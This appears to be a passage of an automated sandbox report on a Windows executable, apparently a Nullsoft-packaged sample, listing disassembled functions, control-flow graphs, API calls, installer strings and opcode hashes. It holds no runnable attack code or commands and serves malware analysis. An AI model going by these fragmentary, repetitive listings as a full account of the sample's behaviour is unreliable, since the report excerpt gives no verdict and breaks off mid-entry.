        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
        • String ID: (7B${
        • API String ID: 590372296-525222780
        • Opcode ID: 972fd15b03a93e7331ef4c8797c1849d59520224656438122eee1199d8052db9
        • Instruction ID: 42ee76c5c0789c909e5484b793d5ed8b68dab9236198efc003755603ec60545b
        • Opcode Fuzzy Hash: 972fd15b03a93e7331ef4c8797c1849d59520224656438122eee1199d8052db9
        • Instruction Fuzzy Hash: A4B16971900608FFDB119FA0DD89AAE7B79FB08354F00847AFA45B61A0CB754E51DF68
        Function 00405A03 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 492 405a03-405a29 call 405cce 495 405a42-405a49 492->495 496 405a2b-405a3d DeleteFileW 492->496 498 405a4b-405a4d 495->498 499 405a5c-405a6c call 406212 495->499 497 405bbf-405bc3 496->497 500 405a53-405a56 498->500 501 405b6d-405b72 498->501 507 405a7b-405a7c call 405c12 499->507 508 405a6e-405a79 lstrcatW 499->508 500->499 500->501 501->497 503 405b74-405b77 501->503 505 405b81-405b89 call 406555 503->505 506 405b79-405b7f 503->506 505->497 516 405b8b-405b9f call 405bc6 call 4059bb 505->516 506->497 511 405a81-405a85 507->511 508->511 512 405a91-405a97 lstrcatW 511->512 513 405a87-405a8f 511->513 515 405a9c-405ab8 lstrlenW FindFirstFileW 512->515 513->512 513->515 517 405b62-405b66 515->517 518 405abe-405ac6 515->518 532 405ba1-405ba4 516->532 533 405bb7-405bba call 405371 516->533 517->501 523 405b68 517->523 520 405ae6-405afa call 406212 518->520 521 405ac8-405ad0 518->521 534 405b11-405b1c call 4059bb 520->534 535 405afc-405b04 520->535 524 405ad2-405ada 521->524 525 405b45-405b55 FindNextFileW 521->525 523->501 524->520 528 405adc-405ae4 524->528 525->518 531 405b5b-405b5c FindClose 525->531 528->520 528->525 531->517 532->506 538 405ba6-405bb5 call 405371 call 4060b3 532->538 533->497 543 405b3d-405b40 call 405371 534->543 544 405b1e-405b21 534->544 535->525 539 405b06-405b0f call 405a03 535->539 538->497 539->525 543->525 547 405b23-405b33 call 405371 call 4060b3 544->547 548 405b35-405b3b 544->548 547->525 548->525
        APIs
        • DeleteFileW.KERNELBASE(?,?,75923420,75922EE0,00000000), ref: 00405A2C
        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*,?,?,75923420,75922EE0,00000000), ref: 00405A74
        • lstrcatW.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*,?,?,75923420,75922EE0,00000000), ref: 00405A97
        • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*,?,?,75923420,75922EE0,00000000), ref: 00405A9D
        • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*,?,?,75923420,75922EE0,00000000), ref: 00405AAD
        • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B4D
        • FindClose.KERNELBASE(00000000), ref: 00405B5C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
        • String ID: "C:\Users\user\Desktop\Ej86aa7Ki7.exe"$C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*$\*.*
        • API String ID: 2035342205-1890369973
        • Opcode ID: bf521971237f06a6bfd3a8137c3f0154ea7fee40ee360af2ff33bb12ffbce5a4
        • Instruction ID: 3abc1f52a39f62d65ddaa07d2a5323def7e4f5b1e1581b0ba6d8596f0725500f
        • Opcode Fuzzy Hash: bf521971237f06a6bfd3a8137c3f0154ea7fee40ee360af2ff33bb12ffbce5a4
        • Instruction Fuzzy Hash: FA41CE30901A18AADB31AB668C89ABF7678EF41714F10427BF801711D1D7BC69829E6E
        Function 004068DA Relevance: 5.4, APIs: 4, Instructions: 382COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
        • Instruction ID: a9eeadc94889c10b02ffd6b9c25b4bb5d01c95f6ce45251ce11bee8d9ce53b4a
        • Opcode Fuzzy Hash: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
        • Instruction Fuzzy Hash: BFF18671D04229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281C7785A86CF45
        Function 00406555 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
        Download Yara Rule
        APIs
        • FindFirstFileW.KERNELBASE(75923420,00426778,00425F30,00405D17,00425F30,00425F30,00000000,00425F30,00425F30,75923420,?,75922EE0,00405A23,?,75923420,75922EE0), ref: 00406560
        • FindClose.KERNEL32(00000000), ref: 0040656C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Find$CloseFileFirst
        • String ID: xgB
        • API String ID: 2295610775-399326502
        • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
        • Instruction ID: a17ed3a5ae88bd5f55df5b749dd223de66f1ff534e9406d7b6838b5a0b6fdea6
        • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
        • Instruction Fuzzy Hash: 6FD01231904530ABC3111778BE0CC5B7A689F553717628F36F466F12F4C7348C22869C
        Function 0040287E Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
        Download Yara Rule
        APIs
        • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040288D
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: FileFindFirst
        • String ID:
        • API String ID: 1974802433-0
        • Opcode ID: 9323f67070c748f2fb38eb47c4ecaa0c4878dfa375b749d9aa371aba0a027b7e
        • Instruction ID: 47d6d4f0c9e08c45c0f9c68b677465f339eb18c6442485c4f22287ce904ecf90
        • Opcode Fuzzy Hash: 9323f67070c748f2fb38eb47c4ecaa0c4878dfa375b749d9aa371aba0a027b7e
        • Instruction Fuzzy Hash: 76F08971A04104DBDB50EBE4D94999DB374EF14314F2185BBE112F71D0D7B849819B29
        Function 00403DFE Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 182 403dfe-403e10 183 403f51-403f60 182->183 184 403e16-403e1c 182->184 186 403f62-403faa GetDlgItem * 2 call 4042d6 SetClassLongW call 40140b 183->186 187 403faf-403fc4 183->187 184->183 185 403e22-403e2b 184->185 188 403e40-403e43 185->188 189 403e2d-403e3a SetWindowPos 185->189 186->187 191 404004-404009 call 404322 187->191 192 403fc6-403fc9 187->192 194 403e45-403e57 ShowWindow 188->194 195 403e5d-403e63 188->195 189->188 201 40400e-404029 191->201 197 403fcb-403fd6 call 401389 192->197 198 403ffc-403ffe 192->198 194->195 202 403e65-403e7a DestroyWindow 195->202 203 403e7f-403e82 195->203 197->198 213 403fd8-403ff7 SendMessageW 197->213 198->191 200 4042a3 198->200 208 4042a5-4042ac 200->208 206 404032-404038 201->206 207 40402b-40402d call 40140b 201->207 209 404280-404286 202->209 211 403e84-403e90 SetWindowLongW 203->211 212 403e95-403e9b 203->212 216 404261-40427a DestroyWindow KiUserCallbackDispatcher 206->216 217 40403e-404049 206->217 207->206 209->200 214 404288-40428e 209->214 211->208 218 403ea1-403eb2 GetDlgItem 212->218 219 403f3e-403f4c call 40433d 212->219 213->208 214->200 223 404290-404299 ShowWindow 214->223 216->209 217->216 224 40404f-40409c call 406234 call 4042d6 * 3 GetDlgItem 217->224 220 403ed1-403ed4 218->220 221 403eb4-403ecb SendMessageW IsWindowEnabled 218->221 219->208 225 403ed6-403ed7 220->225 226 403ed9-403edc 220->226 221->200 221->220 223->200 252 4040a6-4040e2 ShowWindow KiUserCallbackDispatcher call 4042f8 EnableWindow 224->252 253 40409e-4040a3 224->253 229 403f07-403f0c call 4042af 225->229 230 403eea-403eef 226->230 231 403ede-403ee4 226->231 229->219 233 403f25-403f38 SendMessageW 230->233 235 403ef1-403ef7 230->235 231->233 234 403ee6-403ee8 231->234 233->219 234->229 238 403ef9-403eff call 40140b 235->238 239 403f0e-403f17 call 40140b 235->239 250 403f05 238->250 239->219 248 403f19-403f23 239->248 248->250 250->229 256 4040e4-4040e5 252->256 257 4040e7 252->257 253->252 258 4040e9-404117 GetSystemMenu EnableMenuItem SendMessageW 256->258 257->258 259 404119-40412a SendMessageW 258->259 260 40412c 258->260 261 404132-404170 call 40430b call 406212 lstrlenW call 406234 SetWindowTextW call 401389 259->261 260->261 261->201 270 404176-404178 261->270 270->201 271 40417e-404182 270->271 272 4041a1-4041b5 DestroyWindow 271->272 273 404184-40418a 271->273 272->209 275 4041bb-4041e8 CreateDialogParamW 272->275 273->200 274 404190-404196 273->274 274->201 276 40419c 274->276 275->209 277 4041ee-404245 call 4042d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 275->277 276->200 277->200 282 404247-40425a ShowWindow call 404322 277->282 284 40425f 282->284 284->209
        APIs
        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E3A
        • ShowWindow.USER32(?), ref: 00403E57
        • DestroyWindow.USER32 ref: 00403E6B
        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403E87
        • GetDlgItem.USER32(?,?), ref: 00403EA8
        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBC
        • IsWindowEnabled.USER32(00000000), ref: 00403EC3
        • GetDlgItem.USER32(?,00000001), ref: 00403F71
        • GetDlgItem.USER32(?,00000002), ref: 00403F7B
        • SetClassLongW.USER32(?,000000F2,?), ref: 00403F95
        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403FE6
        • GetDlgItem.USER32(?,00000003), ref: 0040408C
        • ShowWindow.USER32(00000000,?), ref: 004040AD
        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040BF
        • EnableWindow.USER32(?,?), ref: 004040DA
        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040F0
        • EnableMenuItem.USER32(00000000), ref: 004040F7
        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040410F
        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404122
        • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 0040414B
        • SetWindowTextW.USER32(?,00423728), ref: 0040415F
        • ShowWindow.USER32(?,0000000A), ref: 00404293
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
        • String ID: (7B
        • API String ID: 3282139019-3251261122
        • Opcode ID: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
        • Instruction ID: fc2721e09aaab4c72f4ebfdf2c157598dee1e076b88a1be66e463b94688f5fa6
        • Opcode Fuzzy Hash: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
        • Instruction Fuzzy Hash: 6BC1C2B1600201FFCB21AF61ED85E2B3AB9EB95345F40057EFA41B11F0CB7998529B2D
        Function 00403A5B Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 285 403a5b-403a73 call 4065ec 288 403a75-403a85 call 406159 285->288 289 403a87-403abe call 4060df 285->289 298 403ae1-403b0a call 403d31 call 405cce 288->298 293 403ac0-403ad1 call 4060df 289->293 294 403ad6-403adc lstrcatW 289->294 293->294 294->298 303 403b10-403b15 298->303 304 403b9c-403ba4 call 405cce 298->304 303->304 305 403b1b-403b35 call 4060df 303->305 309 403bb2-403bd7 LoadImageW 304->309 310 403ba6-403bad call 406234 304->310 311 403b3a-403b43 305->311 314 403c58-403c60 call 40140b 309->314 315 403bd9-403c09 RegisterClassW 309->315 310->309 311->304 312 403b45-403b49 311->312 316 403b5b-403b67 lstrlenW 312->316 317 403b4b-403b58 call 405bf3 312->317 328 403c62-403c65 314->328 329 403c6a-403c75 call 403d31 314->329 318 403d27 315->318 319 403c0f-403c53 SystemParametersInfoW CreateWindowExW 315->319 323 403b69-403b77 lstrcmpiW 316->323 324 403b8f-403b97 call 405bc6 call 406212 316->324 317->316 322 403d29-403d30 318->322 319->314 323->324 327 403b79-403b83 GetFileAttributesW 323->327 324->304 331 403b85-403b87 327->331 332 403b89-403b8a call 405c12 327->332 328->322 338 403c7b-403c95 ShowWindow call 40657c 329->338 339 403cfe-403cff call 405444 329->339 331->324 331->332 332->324 344 403ca1-403cb3 GetClassInfoW 338->344 345 403c97-403c9c call 40657c 338->345 342 403d04-403d06 339->342 346 403d20-403d22 call 40140b 342->346 347 403d08-403d0e 342->347 350 403cb5-403cc5 GetClassInfoW RegisterClassW 344->350 351 403ccb-403cee DialogBoxParamW call 40140b 344->351 345->344 346->318 347->328 352 403d14-403d1b call 40140b 347->352 350->351 355 403cf3-403cfc call 4039ab 351->355 352->328 355->322
        APIs
          • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
          • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
        • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000000), ref: 00403ADC
        • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,C:\Users\user\AppData\Roaming\afdragsordning,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,75923420), ref: 00403B5C
        • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,C:\Users\user\AppData\Roaming\afdragsordning,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403B6F
        • GetFileAttributesW.KERNEL32(004281E0), ref: 00403B7A
        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\afdragsordning), ref: 00403BC3
          • Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166
        • RegisterClassW.USER32(004291E0), ref: 00403C00
        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C18
        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C4D
        • ShowWindow.USER32(00000005,00000000), ref: 00403C83
        • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403CAF
        • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403CBC
        • RegisterClassW.USER32(004291E0), ref: 00403CC5
        • DialogBoxParamW.USER32(?,00000000,00403DFE,00000000), ref: 00403CE4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
        • String ID: Completed$"C:\Users\user\Desktop\Ej86aa7Ki7.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\afdragsordning$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
        • API String ID: 1975747703-4160840715
        • Opcode ID: 6b377800bd07bcba5734f56e34084f7132bdecffcf0977c8fa7c0fe37e1477d4
        • Instruction ID: a49deb01357f173a4aad96dc60f9d02752f373419f451c4cfac2514e29acbaba
        • Opcode Fuzzy Hash: 6b377800bd07bcba5734f56e34084f7132bdecffcf0977c8fa7c0fe37e1477d4
        • Instruction Fuzzy Hash: ED61C370240300BAD620AF669D45E2B3A7CEB84749F40457EF941B22E2DB7D9D52CA2D
        Function 00402ED5 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 359 402ed5-402f23 GetTickCount GetModuleFileNameW call 405de7 362 402f25-402f2a 359->362 363 402f2f-402f5d call 406212 call 405c12 call 406212 GetFileSize 359->363 365 403174-403178 362->365 371 402f63-402f7a 363->371 372 40304d-40305b call 402e33 363->372 374 402f7c 371->374 375 402f7e-402f8b call 4033ec 371->375 378 403061-403064 372->378 379 40312c-403131 372->379 374->375 383 402f91-402f97 375->383 384 4030e8-4030f0 call 402e33 375->384 381 403090-4030dc GlobalAlloc call 40670b call 405e16 CreateFileW 378->381 382 403066-40307e call 403402 call 4033ec 378->382 379->365 407 4030f2-403122 call 403402 call 40317b 381->407 408 4030de-4030e3 381->408 382->379 410 403084-40308a 382->410 388 403017-40301b 383->388 389 402f99-402fb1 call 405da2 383->389 384->379 392 403024-40302a 388->392 393 40301d-403023 call 402e33 388->393 389->392 406 402fb3-402fba 389->406 398 40302c-40303a call 40669d 392->398 399 40303d-403047 392->399 393->392 398->399 399->371 399->372 406->392 409 402fbc-402fc3 406->409 419 403127-40312a 407->419 408->365 409->392 412 402fc5-402fcc 409->412 410->379 410->381 412->392 414 402fce-402fd5 412->414 414->392 416 402fd7-402ff7 414->416 416->379 418 402ffd-403001 416->418 420 403003-403007 418->420 421 403009-403011 418->421 419->379 422 403133-403144 419->422 420->372 420->421 421->392 423 403013-403015 421->423 424 403146 422->424 425 40314c-403151 422->425 423->392 424->425 426 403152-403158 425->426 426->426 427 40315a-403172 call 405da2 426->427 427->365
        APIs
        • GetTickCount.KERNEL32 ref: 00402EE9
        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Ej86aa7Ki7.exe,00000400), ref: 00402F05
          • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\Ej86aa7Ki7.exe,80000000,00000003), ref: 00405DEB
          • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ej86aa7Ki7.exe,C:\Users\user\Desktop\Ej86aa7Ki7.exe,80000000,00000003), ref: 00402F4E
        • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403095
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
        • String ID: "C:\Users\user\Desktop\Ej86aa7Ki7.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Ej86aa7Ki7.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
        • API String ID: 2803837635-158477593
        • Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
        • Instruction ID: 3828440c67d76786f1e0e44594fc16ccb97003feb117245618602a5e37269db8
        • Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
